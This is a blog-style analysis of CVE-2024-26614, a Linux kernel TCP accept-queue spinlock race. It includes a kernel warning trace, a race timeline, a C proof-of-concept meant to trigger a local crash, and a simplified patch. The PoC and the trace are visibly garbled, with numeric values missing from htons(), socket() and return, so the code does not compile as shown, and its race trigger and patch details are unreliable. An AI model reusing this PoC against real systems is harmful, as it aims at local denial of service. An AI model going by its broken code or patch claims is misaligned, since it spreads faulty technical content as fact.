CVE-2024-26614 - Linux Kernel TCP Accept Queue Spinlock Initialization Vulnerability – Analysis, Exploit, and Remediation
On the cutting edge of Linux kernel security, CVE-2024-26614 emerges as a subtle yet serious concurrency bug in the TCP implementation. It hinges on improper initialization of spinlocks for a connection's accept queue, potentially resulting in a corrupted lock value, nasty kernel warnings, or even undefined behavior. This vulnerability was triggered and analyzed using the syzkaller fuzzer and has now been resolved in upstream kernels.
This article takes you through the vulnerability and its exploitability, covers kernel trace details, and discusses code changes that ensure the bug cannot harm systems anymore.
Summary
- Component: Linux kernel, net/ipv4/inet_connection_sock.c
- Cause: Failure to guarantee a one-time initialization of the accept_queue's spinlocks in TCP sockets.
Impact: Potentially corrupted internal lock states, leading to kernel warnings or crashes.
- CVE Identifier: CVE-2024-26614
- Upstream Fix: commit upstream
The Problem
Linux uses spinlocks to synchronize access to internal kernel structures. In TCP, a crucial structure is the accept_queue, used for queuing new incoming connections before userspace accepts them.
The vulnerable code failed to ensure that the accept_queue's spinlock was properly initialized only once, especially in certain rare, racy scenarios where connections were being established and closed concurrently.
The following kernel warning demonstrates the hazard
pvqspinlock: lock xffff9d181cd5c660 has corrupted value x!
WARNING: CPU: 19 PID: 21160 at __pv_queued_spin_unlock_slowpath (kernel/locking/qspinlock_paravirt.h:508)
...
inet_csk_reqsk_queue_add
- (concurrent) inet_shutdown / tcp_disconnect / tcp_set_state(sk, TCP_CLOSE)
During these races, if the accept queue's spinlock is not initialized correctly, unlocking it creates corruption or triggers a panic.
The Race Condition (Simplified Timeline)
Thread A (receiving connections) Thread B (tearing down connection)
tcp_v4_rcv() inet_shutdown()
tcp_check_req() tcp_disconnect()
inet_csk_complete_hashdance() tcp_set_state(sk, TCP_CLOSE)
inet_csk_reqsk_queue_add()
If initialization is not robust, concurrent teardown can see an uninitialized lock.
Here is the problematic code section, simplified
// net/ipv4/inet_connection_sock.c
struct inet_connection_sock {
struct request_sock_queue accept_queue;
...
};
int inet_csk_reqsk_queue_add(...)
{
// ... eventually accesses accept_queue.lock
spin_lock(&icsk->accept_queue.lock);
// ... critical section ...
spin_unlock(&icsk->accept_queue.lock);
}
The bug is that in rare races (connection dance ↔ disconnect), the lock might never be properly initialized.
Root Cause
The kernel must ensure that every spinlock is initialized *exactly once* (and before any use). In the TCP socket's lifetime, quick kill/re-init or teardown/connection racing created windows where a former accept_queue spinlock pointer gets used uninitialized.
Proof-of-Concept: Trigger Using Syzkaller
Syzkaller (an automated kernel fuzzer) found the issue. Below is a minimal PoC-style C program to simulate the race. (May need root and unpatched kernel to trigger.)
// Compile: gcc -o poc poc.c && ./poc
#define _GNU_SOURCE
#include <pthread.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <stdio.h>
void *shutdown_thread(void *arg) {
int s = *(int*)arg;
sleep(1); // Slight delay to overlap with connect()
shutdown(s, SHUT_RDWR);
close(s);
return NULL;
}
int main() {
struct sockaddr_in addr = {};
addr.sin_family = AF_INET;
addr.sin_port = htons();
addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
int listen_s = socket(AF_INET, SOCK_STREAM, );
bind(listen_s, (struct sockaddr*)&addr, sizeof(addr));
listen(listen_s, 1);
socklen_t len = sizeof(addr);
getsockname(listen_s, (struct sockaddr*)&addr, &len);
int client_s = socket(AF_INET, SOCK_STREAM, );
pthread_t thr;
pthread_create(&thr, NULL, shutdown_thread, &client_s);
connect(client_s, (struct sockaddr*)&addr, sizeof(addr));
int conn_s = accept(listen_s, NULL, NULL);
pthread_join(thr, NULL);
close(conn_s);
close(listen_s);
return ;
}
What happens? On a vulnerable kernel, running this code quickly and repeatedly may output kernel warnings about corrupted spinlocks (shown in dmesg).
Exploitability & Impact
While this bug primarily leads to *kernel warnings or crash* (DoS), and may not be directly exploitable for remote code execution, the significance is high:
- A local user can intentionally trigger this kernel race, potentially crashing the system or causing erratic TCP behavior.
In containerized environments or shared servers, this can be disruptive.
- It demonstrates a common class of bugs: *double initialization or lack-of-init for spinlocks under concurrency*.
The Upstream Patch
The fix was merged into the upstream Linux kernel (see commit 5cccc1e7b21b).
Key Patch Section (simplified)
// net/ipv4/inet_connection_sock.c
void inet_csk_init(struct sock *sk) {
struct inet_connection_sock *icsk = inet_csk(sk);
...
// Ensure the accept_queue lock is initialized ONCE
spin_lock_init(&icsk->accept_queue.lock);
...
}
References
- CVE-2024-26614 (NVD details)
- Linux Kernel upstream fix (commit)
- Syzkaller Kernel Fuzzing Project
- Linux Kernel TCP code
Conclusion
CVE-2024-26614 is a good reminder that locking and initialization bugs are subtle, but serious, in the Linux kernel. While this vulnerability boils down to a mis-timed spinlock initialization in TCP accept queue handling, its effects are real—from kernel warning spam to potential crashes triggered by local users.
Patch, upgrade, and stay vigilant!
*This article is an exclusive, accessible breakdown based entirely on public Linux kernel sources, changelogs, and bug threads—useful for kernel developers, sysadmins, bug bounty hunters, and security enthusiasts alike.*
Timeline
Published on: 03/11/2024 18:15:19 UTC
Last modified on: 11/06/2024 15:35:13 UTC